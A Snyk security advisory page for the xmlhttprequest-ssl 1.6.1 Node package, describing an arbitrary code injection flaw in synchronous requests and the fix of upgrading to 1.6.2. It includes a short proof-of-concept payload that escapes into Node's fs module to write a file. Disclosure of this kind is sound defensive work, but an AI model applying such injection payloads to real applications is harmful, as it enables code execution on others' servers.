Homepage
About Snyk

xmlhttprequest-ssl@1.6.1 vulnerabilities

XMLHttpRequest for Node

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the xmlhttprequest-ssl package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Arbitrary Code Injection

xmlhttprequest-ssl is a fork of xmlhttprequest.

Affected versions of this package are vulnerable to Arbitrary Code Injection. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.

POC

const { XMLHttpRequest } = require("xmlhttprequest")

const xhr = new XMLHttpRequest()
xhr.open("POST", "http://localhost.invalid/", false /* use synchronize request */)
xhr.send("\\');require(\"fs\").writeFileSync(\"/tmp/aaaaa.txt\", \"poc-20210306\");req.end();//")

How to fix Arbitrary Code Injection?

Upgrade xmlhttprequest-ssl to version 1.6.2 or higher.

<1.6.2
Go back to all versions of this package